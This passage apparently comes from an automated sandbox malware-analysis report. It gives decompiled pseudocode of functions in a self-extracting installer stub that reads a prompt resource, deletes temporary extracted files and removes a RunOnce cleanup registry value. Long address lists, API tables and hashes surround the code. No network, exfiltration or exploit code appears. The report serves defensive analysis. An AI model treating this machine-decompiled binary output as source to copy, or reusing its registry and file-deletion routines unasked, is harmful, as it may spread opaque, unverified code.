                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001040DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001040E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: ee76082e17f8de92ae1e20e965e164e5fd90d9d44a5c559440c9561cfc66b777
                                                                                                                                                                                                                                                • Instruction ID: 630211609fa6b796b54a1e92bae48c1dd709516310d64ef4b00d69740a1b9382
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee76082e17f8de92ae1e20e965e164e5fd90d9d44a5c559440c9561cfc66b777
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31CEB1640318ABEB209B65DC88FAB777CEB94710F2041A9F6C5E25A1CBF05CC1CB21
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001051E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001051E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0010468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0010468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E001044B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x109124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x109124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x109124 = 0x80070714;
					goto L10;
				}
				E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x109124 = E00106285();
				goto L10;
			}






                                                                                                                                                                                                                                                0x001051fb
                                                                                                                                                                                                                                                0x00105207
                                                                                                                                                                                                                                                0x0010520b
                                                                                                                                                                                                                                                0x0010523c
                                                                                                                                                                                                                                                0x00105268
                                                                                                                                                                                                                                                0x00105270
                                                                                                                                                                                                                                                0x0010528b
                                                                                                                                                                                                                                                0x00105293
                                                                                                                                                                                                                                                0x0010529c
                                                                                                                                                                                                                                                0x001052a6
                                                                                                                                                                                                                                                0x001052b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001052b0
                                                                                                                                                                                                                                                0x0010529e
                                                                                                                                                                                                                                                0x00105279
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010527b
                                                                                                                                                                                                                                                0x00105273
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105273
                                                                                                                                                                                                                                                0x0010524a
                                                                                                                                                                                                                                                0x00105250
                                                                                                                                                                                                                                                0x00105256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105256
                                                                                                                                                                                                                                                0x00105219
                                                                                                                                                                                                                                                0x00105223
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00102F4D,?,00000002,00000000), ref: 00105201
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00105250
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                • Opcode ID: b3ab9613f815762ba5d41f4a46534dba2f525b21ceef02dcd1bb82d13b8b9ffd
                                                                                                                                                                                                                                                • Instruction ID: d9a3800b1ad488088bd83af525e4a332a1aaf6395f5fe5b1e6f742ad267481c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3ab9613f815762ba5d41f4a46534dba2f525b21ceef02dcd1bb82d13b8b9ffd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E11EFF1300205FBE3286BB15C99B3B619EEF98390B514029B7C2E65D0EBF98C404664
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001052B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                			E001052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x1091e0; // 0x2c18e20
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x108a24 == 0 &&  *0x109a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x108a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x108a24 == 0 &&  *0x109a30 == 0) {
					_push(_t22);
					E00101781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					if(( *0x109a34 & 0x00000020) != 0) {
						E001065E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00102390( &_v268);
					_t11 =  *0x108a20; // 0x0
				}
				if( *0x109a40 != 1 && _t11 != 0) {
					_t11 = E00101FE1(_t22); // executed
				}
				 *0x108a20 =  *0x108a20 & 0x00000000;
				return E00106CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                                0x001052b6
                                                                                                                                                                                                                                                0x001052b6
                                                                                                                                                                                                                                                0x001052b6
                                                                                                                                                                                                                                                0x001052c1
                                                                                                                                                                                                                                                0x001052c8
                                                                                                                                                                                                                                                0x001052cb
                                                                                                                                                                                                                                                0x001052cc
                                                                                                                                                                                                                                                0x001052d4
                                                                                                                                                                                                                                                0x001052d6
                                                                                                                                                                                                                                                0x001052d7
                                                                                                                                                                                                                                                0x001052de
                                                                                                                                                                                                                                                0x001052e0
                                                                                                                                                                                                                                                0x001052f2
                                                                                                                                                                                                                                                0x001052fa
                                                                                                                                                                                                                                                0x001052fa
                                                                                                                                                                                                                                                0x00105302
                                                                                                                                                                                                                                                0x00105305
                                                                                                                                                                                                                                                0x0010530c
                                                                                                                                                                                                                                                0x00105312
                                                                                                                                                                                                                                                0x00105316
                                                                                                                                                                                                                                                0x00105316
                                                                                                                                                                                                                                                0x00105317
                                                                                                                                                                                                                                                0x0010531c
                                                                                                                                                                                                                                                0x0010531f
                                                                                                                                                                                                                                                0x00105333
                                                                                                                                                                                                                                                0x00105345
                                                                                                                                                                                                                                                0x00105351
                                                                                                                                                                                                                                                0x00105359
                                                                                                                                                                                                                                                0x00105359
                                                                                                                                                                                                                                                0x00105363
                                                                                                                                                                                                                                                0x00105369
                                                                                                                                                                                                                                                0x0010536f
                                                                                                                                                                                                                                                0x00105374
                                                                                                                                                                                                                                                0x00105374
                                                                                                                                                                                                                                                0x00105381
                                                                                                                                                                                                                                                0x00105387
                                                                                                                                                                                                                                                0x00105387
                                                                                                                                                                                                                                                0x0010538f
                                                                                                                                                                                                                                                0x001053a0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(02C18E20,00000080,?,00000000), ref: 001052F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(02C18E20), ref: 001052FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02C18E20,?,00000000), ref: 00105305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02C18E20), ref: 0010530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(001011FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00105363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00105334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-3290032183
                                                                                                                                                                                                                                                • Opcode ID: 632f843c7f76a70131795fa7bf1e17390d7ff444a5383a32f5ff8f770ca800ff
                                                                                                                                                                                                                                                • Instruction ID: fc0881c5015b6a600460d4fc3bd14d07d990f2b149c088f6705572d3a331e564
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 632f843c7f76a70131795fa7bf1e17390d7ff444a5383a32f5ff8f770ca800ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0921CA31A04A18DBDB34AB24EC19B6A37A5BB24790F444219F8C25B9E1CFF49CC4CF80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00101FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00101FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x108530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                                0x00101fee
                                                                                                                                                                                                                                                0x00102005
                                                                                                                                                                                                                                                0x0010200d
                                                                                                                                                                                                                                                0x00102017
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102020
                                                                                                                                                                                                                                                0x0010200d
                                                                                                                                                                                                                                                0x00102029

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0010538C,?,?,0010538C), ref: 00102005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(0010538C,wextract_cleanup2,?,?,0010538C), ref: 00102017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(0010538C,?,?,0010538C), ref: 00102020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                                • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                                • Opcode ID: 7733b42c6473c62e1d9d01885e3364714b84185f6d44261e468c1e83a298ff77
                                                                                                                                                                                                                                                • Instruction ID: 1ce2f4ce29d7da5af9bfdc5de8492972dae17aba32ac1f4c60195e9cca84d026
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7733b42c6473c62e1d9d01885e3364714b84185f6d44261e468c1e83a298ff77
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFE04F31954318BBD7219B90EC0EF597B2DFB01740F500194FAC4A04E4EBF25A94D605
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00104CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x108004; // 0xb5a2e1bc
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x1091d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00104E99(_t75);
						L35:
						return E00106CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x108584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x1091e4;
						_t58 = 0x1091e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x1091e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x1091e4;
						_t30 = E00104702( &_v268, 0x1091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0010476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00104980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E001047E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x1093f4 =  *0x1093f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x1091e4;
						_t63 = 0x1091e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x1091e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x1091e4;
						_t30 = E00104702( &_v268, 0x1091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00104C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00104B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00104B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                                0x00104cd0
                                                                                                                                                                                                                                                0x00104cdb
                                                                                                                                                                                                                                                0x00104ce0
                                                                                                                                                                                                                                                0x00104ce2
                                                                                                                                                                                                                                                0x00104cee
                                                                                                                                                                                                                                                0x00104cf2
                                                                                                                                                                                                                                                0x00104d0e
                                                                                                                                                                                                                                                0x00104d0e
                                                                                                                                                                                                                                                0x00104d11
                                                                                                                                                                                                                                                0x00104e83
                                                                                                                                                                                                                                                0x00104e88
                                                                                                                                                                                                                                                0x00104e98
                                                                                                                                                                                                                                                0x00104e98
                                                                                                                                                                                                                                                0x00104d17
                                                                                                                                                                                                                                                0x00104d17
                                                                                                                                                                                                                                                0x00104d1a
                                                                                                                                                                                                                                                0x00104d2f
                                                                                                                                                                                                                                                0x00104d2f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104d2f
                                                                                                                                                                                                                                                0x00104d1c
                                                                                                                                                                                                                                                0x00104d1c
                                                                                                                                                                                                                                                0x00104d1f
                                                                                                                                                                                                                                                0x00104dcb
                                                                                                                                                                                                                                                0x00104dd0
                                                                                                                                                                                                                                                0x00104dd2
                                                                                                                                                                                                                                                0x00104ddd
                                                                                                                                                                                                                                                0x00104ddd
                                                                                                                                                                                                                                                0x00104de3
                                                                                                                                                                                                                                                0x00104de8
                                                                                                                                                                                                                                                0x00104ded
                                                                                                                                                                                                                                                0x00104ded
                                                                                                                                                                                                                                                0x00104def
                                                                                                                                                                                                                                                0x00104df0
                                                                                                                                                                                                                                                0x00104df0
                                                                                                                                                                                                                                                0x00104df4
                                                                                                                                                                                                                                                0x00104df4
                                                                                                                                                                                                                                                0x00104df6
                                                                                                                                                                                                                                                0x00104df9
                                                                                                                                                                                                                                                0x00104dfc
                                                                                                                                                                                                                                                0x00104dfc
                                                                                                                                                                                                                                                0x00104dfe
                                                                                                                                                                                                                                                0x00104dff
                                                                                                                                                                                                                                                0x00104dff
                                                                                                                                                                                                                                                0x00104e03
                                                                                                                                                                                                                                                0x00104e08
                                                                                                                                                                                                                                                0x00104e0a
                                                                                                                                                                                                                                                0x00104e0f
                                                                                                                                                                                                                                                0x00104d03
                                                                                                                                                                                                                                                0x00104d03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104d03
                                                                                                                                                                                                                                                0x00104e18
                                                                                                                                                                                                                                                0x00104e20
                                                                                                                                                                                                                                                0x00104e25
                                                                                                                                                                                                                                                0x00104e27
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104e33
                                                                                                                                                                                                                                                0x00104e38
                                                                                                                                                                                                                                                0x00104e3a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104e40
                                                                                                                                                                                                                                                0x00104e51
                                                                                                                                                                                                                                                0x00104e56
                                                                                                                                                                                                                                                0x00104e5b
                                                                                                                                                                                                                                                0x00104e5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104e6a
                                                                                                                                                                                                                                                0x00104e6f
                                                                                                                                                                                                                                                0x00104e71
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104e77
                                                                                                                                                                                                                                                0x00104e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104e7d
                                                                                                                                                                                                                                                0x00104d25
                                                                                                                                                                                                                                                0x00104d25
                                                                                                                                                                                                                                                0x00104d28
                                                                                                                                                                                                                                                0x00104d36
                                                                                                                                                                                                                                                0x00104d3b
                                                                                                                                                                                                                                                0x00104d40
                                                                                                                                                                                                                                                0x00104d40
                                                                                                                                                                                                                                                0x00104d42
                                                                                                                                                                                                                                                0x00104d43
                                                                                                                                                                                                                                                0x00104d43
                                                                                                                                                                                                                                                0x00104d47
                                                                                                                                                                                                                                                0x00104d4a
                                                                                                                                                                                                                                                0x00104d4a
                                                                                                                                                                                                                                                0x00104d4c
                                                                                                                                                                                                                                                0x00104d4f
                                                                                                                                                                                                                                                0x00104d4f
                                                                                                                                                                                                                                                0x00104d51
                                                                                                                                                                                                                                                0x00104d52
                                                                                                                                                                                                                                                0x00104d52
                                                                                                                                                                                                                                                0x00104d56
                                                                                                                                                                                                                                                0x00104d5b
                                                                                                                                                                                                                                                0x00104d5d
                                                                                                                                                                                                                                                0x00104d62
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104d67
                                                                                                                                                                                                                                                0x00104d6f
                                                                                                                                                                                                                                                0x00104d74
                                                                                                                                                                                                                                                0x00104d76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104d7c
                                                                                                                                                                                                                                                0x00104d84
                                                                                                                                                                                                                                                0x00104d89
                                                                                                                                                                                                                                                0x00104d8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104d94
                                                                                                                                                                                                                                                0x00104d99
                                                                                                                                                                                                                                                0x00104d9e
                                                                                                                                                                                                                                                0x00104da1
                                                                                                                                                                                                                                                0x00104daa
                                                                                                                                                                                                                                                0x00104daa
                                                                                                                                                                                                                                                0x00104da3
                                                                                                                                                                                                                                                0x00104da3
                                                                                                                                                                                                                                                0x00104da3
                                                                                                                                                                                                                                                0x00104db5
                                                                                                                                                                                                                                                0x00104dbb
                                                                                                                                                                                                                                                0x00104dbd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104dc3
                                                                                                                                                                                                                                                0x00104dc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104dc5
                                                                                                                                                                                                                                                0x00104dbd
                                                                                                                                                                                                                                                0x00104d2a
                                                                                                                                                                                                                                                0x00104d2a
                                                                                                                                                                                                                                                0x00104d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104d2d
                                                                                                                                                                                                                                                0x00104cf8
                                                                                                                                                                                                                                                0x00104cfd
                                                                                                                                                                                                                                                0x00104d02
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00104DB5
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00104DDD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 3625706803-3290032183
